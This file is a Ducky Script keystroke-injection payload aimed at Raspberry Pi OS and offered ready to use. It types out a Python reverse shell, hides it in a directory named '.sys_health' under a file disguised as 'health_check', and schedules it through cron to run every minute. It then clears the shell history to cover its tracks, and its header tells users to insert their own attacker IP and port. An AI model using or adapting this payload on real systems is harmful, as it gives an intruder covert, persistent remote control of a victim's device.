REM =============================================================================================
REM Author: fierceoj
REM Description: Python reverse shell, placed into a hidden sh script that uses cron for persistence
REM Target: Raspberry Pi OS
REM Usage: Change attacker IP/URL and port to yours
REM Usage: Catch the shell with a listener
REM =============================================================================================
DELAY 3000
CTRL-ALT F1
DELAY 200
ENTER 

REM Make the hidden directory
STRING mkdir .sys_health
DELAY 200
ENTER
STRING cd .sys_health
DELAY 200
ENTER

REM Add Python reverse shell code to "health_check" sh script
STRING nano health_check
DELAY 200
ENTER 
STRING python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
STRING s.connect(("127.0.0.1",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);
STRING p=subprocess.call(["/bin/sh","-i"]);'
DELAY 200
ENTER
CTRL x
DELAY 200
ENTER
STRING Y
DELAY 200
ENTER

REM Make health_check script executable
STRING chmod +x health_check
DELAY 200
ENTER

REM Add health_check script to crontab
STRING crontab -e 
DELAY 200
ENTER
STRING * * * * * .sys_health/health_check
DELAY 200
ENTER 
CTRL x
DELAY 200
ENTER
STRING Y
DELAY 200
ENTER

REM Clear command history
STRING history -c
DELAY 200
ENTER